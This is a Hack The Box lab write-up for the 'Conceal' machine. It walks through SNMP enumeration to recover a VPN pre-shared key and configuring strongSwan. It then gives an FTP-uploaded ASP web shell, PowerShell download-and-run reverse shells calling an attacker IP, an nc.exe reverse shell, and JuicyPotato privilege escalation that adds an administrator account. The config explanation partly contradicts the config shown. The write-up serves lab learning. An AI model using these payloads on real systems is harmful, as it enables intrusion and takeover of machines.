Hack The Box - Conceal
Conceal was an engaging box to delve into advanced exploitation techniques involving VPN configurations and Windows privilege escalation.
The process began with thorough information gathering, starting with a full port scan that revealed various open UDP ports. Enumerating the ISAKMP and SNMP services provided critical insights, including a VPN password.
Utilizing strongSwan, we configured a VPN connection to the target, enabling further service enumeration. This revealed additional open ports and accessible services, including FTP and a web service.
The exploitation phase included uploading files through FTP and identifying that the server could process ASP files, allowing us to execute commands and obtain a reverse shell. We leveraged nishang for the reverse shell script.
For privilege escalation, we exploited the JuicyPotato vulnerability on Windows, utilizing a valid CLSID to gain higher privileges. This allowed us to create a new user with administrative rights, ultimately leading to root shell access.
Diagram
graph TD
A[Information Gathering] -->|Port Scan| B[UDP Scan]
B --> C[Enumerate ISAKMP]
B --> D[Enumerate SNMP]
D --> E[Configure StrongSwan]
E --> F[New Service Enumeration]
F --> H[Find FTP and Web Service]
H --> I[Privilege Escalation]
I --> J[JuicyPotato Exploit]
J --> K[Gain Root Shell]
Information Gathering
Portscan
Tried to run the enumeration on TCP ports with NMAP but without success. So, I proceeded to enumerate the UDP ports.
Enumeration
ISAKMP 500/UDP
Internet Security Association and Key Management Protocol - Used to establish security keys and security associations in an IP network. Used in conjunction with the IPsec protocol to establish secure VPNs.
Tool to enumerate the service - Sends ISAKLMP packets to the host and will display any response it receives.
SNMP 161/UDP
Simple Network Management Protocol - Used to manage devices on IP networks - Can be used to monitor/configure and control network devices - Routers / Switches / Similar devices
Tool to “walk” through an SNMP agent’s information tree - Listing all available information.
snmpwalk -v1 -c public 10.10.10.116
- “-v1
” specifies the version & “-c Public
” - default community for many devices
Obtained the Windows version:
Hardware: Intel64 Family 6 Model 85 Stepping 7 AT/AT COMPATIBLE -
Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
Host is running VPN IKE
iso.3.6.1.2.1.1.4.0 = STRING: 'IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
Let’s use the strongSwan tool - Provides a complete solution for IPsec and IKEv2 VPNs
sudo apt-get install strongswan
/etc/ipsec.conf
- Here goes the Target IP - Configuration file for the VPN connection1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
# ipsec.conf - strongSwan IPsec configuration file # basic configuration config setup # strictcrlpolicy=yes # uniqueids = no # Add connections here # VPN connection conn myvpn keyexchange=ikev1 authby=secret left=%defaultroute leftsubnet=0.0.0.0/0 right=10.10.10.116 rightsubnet=10.10.10.116/32 ike=3des-sha1-modp1024! esp=3des-sha1! ikelifetime=28800s keylife=3600s rekeymargin=3m keyingtries=1 auto=add
Explanation
conn myvpn
: This defines the name of the connection.keyexchange=ikev2
: This specifies that you want to use the Internet Key Exchange version 2 protocol for this connectionike=aes256-sha1-modp1024!
andesp=aes256-sha1!
: These settings define the encryption and hash algorithms for the IKE negotiation and the ESP security protocol.left=%defaultroute
andleftsubnet=0.0.0.0/0
: These options define the IP address and subnet of the “left” side of the connection (usually the “client” in a client-server connection).right=10.10.10.116
andrightsubnet=0.0.0.0/0
: These options define the IP address and subnet of the “right” side of the connection (usually the “server” in a client-server connection).leftauth=psk
andrightauth=psk
: These options specify that authentication will be done using a pre-shared key (PSK).auto=start
: This specifies that the connection should be started automatically when strongSwan is started.
/etc/ipsec.secrets
- Pre-shared key file - Here goes the found password key1
%any 10.10.10.116 : PSK "9C8B1A372B1878851BE2C097031B6E43"
sudo ipsec restart
- Start the servicesudo ipsec up myvpn
- Connect to the VPN - Could not connect
Maybe the password is wrong 9C8B1A372B1878851BE2C097031B6E43
- Let’s check on crackstation
/etc/ipsec.secrets
1
PSK "Dudecake1!"
/etc/ipsec.conf
1 2 3 4 5 6 7 8 9 10
conn Conceal type=transport keyexchange=ikev1 right=10.10.10.116 authby=psk rightprotoport=tcp leftprotoport=tcp esp=3des-sha1 ike=3des-sha1-modp1024 auto=start
sudo ipsec restart
Ipsec start --nofork
-CHILD_SA Conceal{1} established
- Connection established and ready to run data
Exploitation
New Portscan
After establishing communication with the server, run the enumeration again.
Restarted communication with ipsec and then ran the script again
nmap -p- --min-rate=1000 -sT -T4 10.10.10.116
nmap -sC -sV -p 21,80,135,139,445,49664,49665,49666,49667,49668,49670 -sT 10.10.10.116
Abusing WEB and FTP
Since there’s an open web port, I decided to enumerate directories.
gobuster dir -e -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html --no-error -t 50 | grep -v "(Status: 403)"
As the enumeration showed FTP, let’s connect.
Let’s create a test file to upload to the page through FTP.
With this, we can see that the file teste.php was uploaded, but let’s see the return.
Apparently, the server cannot read a .php file. Let’s try ASP instead of PHP.
0xdf.asp
- Creates a cmd1
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
http://10.10.10.116/upload/0xdf.asp?cmd=whoami
- Now let’s try to get a reverse shell
Getting a reverse shell. Let’s use nishang.
raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
- Adding a line at the end of the scripthttp://10.10.10.116/upload/0xdf.asp?cmd=powershell iex(New-Object Net.Webclient).downloadstring('http://10.10.16.5:8080/Invoke-PowerShellTcp.ps1')
nc -lvnp 443
We got the shell.
Priv Escalation
JuicyPotato
SeImpersonatePrivilege enabled is almost a victory [PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 | itm4n’s blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) |
Couldn’t run, let’s try JuicyPotato
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.16.5:8080/JuicyPotato.exe', 'C:\Users\Destitute\Desktop\JuicyPotato.exe')"
JuicyPotato.exe
Let’s try to find a ‘{CLSID}’ - Since it’s Windows 10 - NMAP enumeration https://github.com/ohpe/juicy-potato/blob/master/CLSID/Windows_10_Enterprise/CLSID.list
Let’s upload the file CLSID_Win10Enterprise.list
which contains the Win10 CLSID list and the test_clsid.bat
file which contains the script to test.
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.16.5:8080/CLSID_Win10Enterprise.list', 'C:\Users\Destitute\Desktop\CLSID.list')"
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.16.5:8080/test_clsid.bat', 'C:\Users\Destitute\Desktop\test_clsid.bat')"
Now I’ll upload a payload for Juicy to execute, note that the payload will be in .bat since I can’t execute commands directly.
cat cmd.bat
.\JuicyPotato.exe -t "*" -p ".\cmd.bat" -l 9001 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
I managed to execute it, but obviously did nothing because the cmd.bat script has nothing special. Let’s upload nc.exe and a .bat to connect.
cat cmd.bat
1
nc.exe 10.10.16.5 1234 -e cmd.exe
.\JuicyPotato.exe -t "*" -p nc.exe -a "-e cmd.exe 10.10.16.5 1234" -l 9001 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
I’ll create a script to create a user, etc.
upgradeshell.bat
1 2
net user /add hendrich 12345678a@ net localgroup Administrators hendrich /add
.\JuicyPotato.exe -t "*" -p ".\upgradeshell.bat" -l 9001 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
Let’s check if it was created.
Psexec
Let’s use psexec to enter the server.
One detail I didn’t notice is that the default JuicyPotato is a 32-bit executable, hence the error. Let’s upload it as a binary in FTP.
tnftp -A 10.10.10.116
jp.exe
cp Invoke-PowerShellTcp.ps1 rev.ps1
- Set another port for the target machine to connect to our IP.badfile.bat
- Uploading through .bat due to strings “ “ and ‘ ‘.1
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8080/rev.ps1')"
It will also be uploaded via FTP.
Another thing is this http://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise/ site is great for viewing the CLSID - We need to pick a service we believe is more common and likely to be active.